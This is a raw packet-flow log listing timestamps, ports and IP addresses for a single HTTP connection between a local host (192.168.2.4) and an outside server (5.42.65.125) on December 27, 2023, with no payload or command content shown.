Dec 27, 2023 17:57:25.875531912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875531912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.875545979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875556946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.875576973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.875577927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875591993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875603914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875622034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.875648975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.875652075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.876085043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876097918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876122952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.876194000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876207113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876218081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876230001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876231909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.876244068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876256943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876257896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.876271963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876286030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.876286983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.876306057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.877192020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877206087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877218008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877232075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877238035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.877245903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877259016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877270937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877276897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877279043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.877290964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877304077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.877315044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.877336025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.878434896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878448963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878493071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878495932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.878508091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878534079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.878571987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878586054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878597975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878607988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.878612041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878624916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878629923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.878638983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.878659010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.879153013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879188061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879225016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.879252911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879266024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879277945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879298925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879304886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.879312992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879323006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.879327059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879339933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879353046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.879354000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.879380941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880007029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880019903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880033016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880044937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880055904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880058050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880070925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880083084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880089998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880095959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880110979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880124092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880125999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880146027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880791903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880846024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880850077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880907059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880920887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880950928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880956888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880965948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880981922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.880985975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.880996943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.881015062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.881031990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.881046057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.881083012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.882230043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882244110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882273912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.882353067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882366896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882379055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882388115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.882391930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882405043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882409096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.882417917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882431984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882436991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.882447004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.882481098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883552074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883605003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883637905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883651972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883652925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883667946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883680105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883696079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883708954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883712053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883723974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883737087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883760929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883760929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883785009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883846045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883858919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883872032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883894920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883904934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883908033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883922100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883929014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883935928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883946896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883949995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.883975029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.883996010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884008884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884044886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.884541035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884556055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884567976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884582043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884588957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.884618998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.884641886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884658098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884670973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884679079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.884685993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884700060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884708881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.884712934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.884737968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.885359049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885373116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885395050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885400057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.885411024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885432959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.885467052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885481119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885493040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885504961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885507107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.885535955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885538101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.885551929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.885588884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.886276960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886318922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.886450052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886464119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886476040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886488914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886501074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.886501074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886518002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886526108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.886529922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886543036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886554956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.886555910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.886580944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.887176991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887190104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887229919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887231112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.887245893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887259007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887288094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.887315035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.887316942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887332916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887356043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887368917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887372017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.887394905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.887433052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.888135910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888149977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888161898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888176918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.888200998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.888226032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888240099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888252020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888264894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888277054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.888278961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888293028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888295889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.888308048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.888345003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.889025927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889039040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889086962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.889101028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889115095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889127016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889139891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889139891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.889154911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889166117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.889189005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889203072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889209032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.889216900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.889236927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890335083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890350103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890362024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890374899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890383005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890388012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890402079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890408039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890418053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890423059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890433073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890445948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890450954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890461922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890491962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890749931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890928030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890940905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890954971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890968084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890974045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890983105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.890995026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.890995979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891011000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891024113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891036987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891038895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.891051054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891057014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.891098976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.891731977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891745090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891757011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891787052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.891961098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891974926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891988039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.891999960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892003059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.892013073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892025948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892030954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.892039061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892045975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.892055988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892074108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.892945051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892957926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892971992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892985106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.892990112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893011093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893074989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893089056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893101931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893115997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893126965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893130064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893143892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893152952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893157959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893168926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893201113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893697977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893712044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893724918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893748999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893771887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893788099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893821955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893887997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893901110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893913984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893927097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893929005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893946886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893955946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.893960953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.893984079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.894741058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894768953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894809961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.894819021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894833088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894845963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894856930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.894870996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.894886971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895205975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895219088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895237923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895262957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895283937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895287037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895303011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895339966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895366907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895382881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895395041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895409107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895421982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895422935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895438910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.895445108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.895472050 CET	49738	80	192.168.2.4	5.42.65.125
